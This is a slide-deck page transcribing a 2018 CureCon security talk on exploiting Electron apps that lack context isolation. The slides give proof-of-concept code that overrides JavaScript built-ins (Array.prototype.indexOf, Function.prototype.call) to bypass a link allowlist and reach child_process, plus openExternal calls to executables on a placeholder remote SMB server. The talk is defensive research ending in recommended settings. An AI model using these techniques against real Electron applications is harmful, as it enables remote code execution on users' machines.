$30 off During Our Annual Pro Sale. View Details »

Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)

Masato Kinugawa
August 18, 2018
Research
9
21k

Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)

ベルリンで開催されたCure53のイベント、CureConの資料です。

Masato Kinugawa

August 18, 2018
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
masatokinugawa
13
14k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
masatokinugawa
0
10k
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
21
6.2k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
87k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
masatokinugawa
18
11k
5文字で書くJavaScript/ Shibuya.XSS techtalk #10
masatokinugawa
35
19k
ブラウザのUIのバグを探す / Secusoba PopUnder
masatokinugawa
2
1.8k
攻撃者視点で見る Service Worker / PWA Study SW
masatokinugawa
20
25k
USAGE OF XSS FILTER
masatokinugawa
4
2.6k

Other Decks in Research

See All in Research
遺伝的アルゴリズムの簡単な紹介
kentaitakura
0
320
経営層と現場のすれ違いから考える これからのUX改善
rina_glutton
1
790
DroidKaigi2023 突撃!隣のコードレビュー
satotaichi
0
2.1k
Google Cloud Next’23「Title:出店ブースで10社以上におすすめ機能を質問してきた」
yasumuusan
0
390
論文紹介:What Learning Algorithm is In-Context Learning? Investigation with Linear Models
kosuken
0
370
グラフを用いた近似最近傍探索の理論と応用
matsui_528
12
10k
[NLPコロキウム 2023/9/13] Unbalanced Optimal Transport for Unbalanced Word Alignment
yukiar
2
210
機械学習における重要度重み付けとその応用
mkimura
3
1.2k
RSJ2023「基盤モデルの実ロボット応用」チュートリアル2(実ロボット用の基盤モデルを作って活用する方法)
tmats
1
730
第59回名古屋CV・PRMU勉強会:ICCV2023論文紹介(自己教師あり学習)
naok615
0
200
Data-to-Text Datasetまとめ ― Summary of Data-to-Text Datasets ―
akihikowatanabe
0
170
Hand Rehabilitation Lab Research Projects
ahspragu
0
520

Featured

See All Featured
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
marktimemedia
16
1.5k
What's new in Ruby 2.0
geeforr
335
30k
Adopting Sorbet at Scale
ufuk
66
8.2k
How To Stay Up To Date on Web Technology
chriscoyier
780
250k
The Pragmatic Product Professional
lauravandoore
23
5.4k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
12
1.1k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
1
1.1k
Fontdeck: Realign not Redesign
paulrobertlloyd
74
4.7k
How to train your dragon (web standard)
notwaldorf
71
4.8k
How New CSS Is Changing Everything About Graphic Design on the Web
jensimmons
215
12k
Building Applications with DynamoDB
mza
87
5.3k
Bash Introduction
62gerente
603
210k

Transcript

  1. Masato Kinugawa
    CureCon 08/2018

    View Slide




  2. View Slide





  3. View Slide

  4. View Slide

  5. 1

    View Slide



  6. View Slide

  7. https://electronjs.org/#apps

    View Slide




  8. View Slide

  9. main.js
    const {BrowserWindow} = require('electron');
    let win = new BrowserWindow();
    //Open Renderer Process
    win.loadURL(`file://${__dirname}/index.html`);

    View Slide

  10. index.html



    TEST


    Hello Electron!
    <br/>body{<br/>background:url('island.png')<br/>}<br/>


    View Slide



  11. new BrowserWindow({
    webPreferences:{
    "FEATURE_NAME": true
    }
    });

    View Slide





  12. View Slide

  13. let win = new BrowserWindow({
    webPreferences:{
    nodeIntegration: true
    }
    });
    win.loadURL(`[...] index.html`);
    main.js

    <br/>require('child_process')<br/>.exec('calc')<br/>

    index.html

    View Slide



  14. new BrowserWindow({
    webPreferences:{
    nodeIntegration: false,
    preload: path.join(__dirname,'preload.js')
    }
    });
    main.js

    View Slide

  15. /* preload.js */
    typeof require === 'function';//true
    window.runCalc = function(){
    require('child_process').exec('calc')
    };


    <br/>typeof require === 'undefined';//true<br/>runCalc();<br/>

    Node

    View Slide




  16. View Slide

  17. new BrowserWindow({
    webPreferences:{
    nodeIntegration: false,
    contextIsolation: true,
    preload: path.join(__dirname,'preload.js')
    }
    });

    View Slide

  18. 2

    View Slide




  19. View Slide



  20. View Slide

  21. https://github.com/electron/i18n/blob/81f707c69562cb91fe7c5a98270827a28b93fd5f/content/ja-
    JP/docs/tutorial/security.md#3-リモートコンテンツでコンテキストイソレーションを有効にする

    View Slide

  22. /* Content Script */
    window.abc = 123;
    /* https://example.com */
    alert(window.abc)//undefined
    Isolated
    World

    View Slide

  23. /* preload.js */
    window.abc = 123;
    /* index.html */
    alert(window.abc)//123
    Isolated
    World

    View Slide

  24. /* preload.js */
    window.abc = 123;
    /* index.html */
    alert(window.abc)//undefined
    Isolated
    World

    View Slide

  25. /* preload.js */
    onmessage=function(e){
    if(e.data==='runCalc'){
    require('child_process').exec('calc')
    }
    }
    /* index.html */
    postMessage('runCalc','*')
    Isolated
    World

    View Slide



  26. View Slide

  27. 3

    View Slide

  28. View Slide

  29. View Slide

  30. /* preload.js */
    const {shell} = require('electron');
    const SAFE_PROTOCOLS = ["http:", "https:"];
    document.addEventListener('click', (e) => {
    if (e.target.nodeName === 'A') {
    var link = e.target;
    if (SAFE_PROTOCOLS.indexOf(link.protocol) !== -1) {
    shell.openExternal(link.href);
    } else {
    alert('This link is not allowed');
    }
    e.preventDefault();
    }
    }, false);
    http(s):

    View Slide

  31. const {shell} = require('electron');
    /* */
    shell.openExternal('https://example.com/');
    /* */
    shell.openExternal('mailto:[email protected]');
    /* */
    shell.openExternal('file:///C:/windows/system32/calc.exe');

    View Slide

  32. /* preload.js */
    const {shell} = require('electron');
    const SAFE_PROTOCOLS = ["http:", "https:"];
    document.addEventListener('click', (e) => {
    if (e.target.nodeName === 'A') {
    var link = e.target;
    if (SAFE_PROTOCOLS.indexOf(link.protocol) !== -1) {
    shell.openExternal(link.href);
    } else {
    alert('This link is not allowed');
    }
    e.preventDefault();
    }
    }, false);

    View Slide

  33. <br/>Array.prototype.indexOf = function(){<br/>return 1337;<br/>}<br/>

    View Slide

  34. if (SAFE_PROTOCOLS.indexOf(link.protocol) !== -1) {
    shell.openExternal(link.href);
    }

    View Slide

  35. if (1337 !== -1) {
    shell.openExternal(link.href);
    }

    View Slide

  36. <br/>Array.prototype.indexOf=function(){<br/>return 1337;<br/>}<br/>
    CLICK
    Click
    if (1337 !== -1) {
    shell.openExternal(link.href);
    }

    View Slide



  37. View Slide

  38. const { shell } = require('electron');
    shell.openExternal("file://[REMOTE_SMB_SERVER]/share/test.exe");

    View Slide

  39. const { shell } = require('electron');
    shell.openExternal("file://[REMOTE_SMB_SERVER]/share/test.SettingContent-ms");

    The Tale of SettingContent-ms Files – Posts By SpecterOps Team Members(Matt Nelson)
    https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39

    View Slide




  40. InsertScript: DLL Hijacking via URL files (Alex Inführ)
    https://insert-script.blogspot.com/2018/05/dll-hijacking-via-
    url-files.html

    View Slide




  41. View Slide

  42. // Clean cache on quit.
    process.on('exit', function () {
    for (let p in cachedArchives) {
    if (!hasProp.call(cachedArchives, p)) continue
    cachedArchives[p].destroy()
    }
    })
    https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib
    /common/asar.js#L30-L36

    View Slide

  43. EventEmitter.prototype.emit = function emit(type) {
    [...]
    handler = events[type];
    [...]
    var isFn = typeof handler === 'function';
    len = arguments.length;
    switch (len) {
    // fast cases
    case 1:
    emitNone(handler, isFn, this);
    break;
    case 2:
    [...]
    }
    };
    https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/lib/events.js#L156-L231

    View Slide

  44. function emitNone(handler, isFn, self) {
    if (isFn)
    handler.call(self);
    else {
    var len = handler.length;
    var listeners = arrayClone(handler, len);
    for (var i = 0; i < len; ++i)
    listeners[i].call(self);
    }
    }
    https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/lib/events.js#L104-L113

    View Slide

  45. function emitNone(handler, isFn, self) {
    if (isFn)
    handler.call(self);
    else {
    var len = handler.length;
    var listeners = arrayClone(handler, len);
    for (var i = 0; i < len; ++i)
    listeners[i].call(self);
    }
    }

    View Slide

  46. process.mainModule.require

    View Slide

  47. function emitNone(handler, isFn, self) {
    if (isFn)
    handler.call(self);
    else {
    var len = handler.length;
    var listeners = arrayClone(handler, len);
    for (var i = 0; i < len; ++i)
    listeners[i].call(self);
    }
    }

    View Slide

  48. <br/>Function.prototype.call=function(process){<br/>process.mainModule.require('child_process').execSync('calc');<br/>}<br/>location.reload();//<br/>

    View Slide

  49. function emitNone(handler, isFn, self) {
    if (isFn)
    handler.call(self);
    else {
    var len = handler.length;
    var listeners = arrayClone(handler, len);
    for (var i = 0; i < len; ++i)
    listeners[i].call(self);
    }
    }
    Function.prototype.call=function(process){
    process.mainModule.require('child_process').execSync('calc');
    }

    View Slide

  50. • XSS

    • MitM
    JS
    contextIsolation RCE

    View Slide



  51. View Slide



  52. View Slide



  53. /* preload.js */
    document.addEventListener('click', (e) => {
    /*
    }, false);

    View Slide



  54. new BrowserWindow({
    webPreferences:{
    nodeIntegration: false,
    contextIsolation: true,
    preload: path.join(__dirname,'preload.js')
    }
    });
    IMPORTANT!

    View Slide

  55. View Slide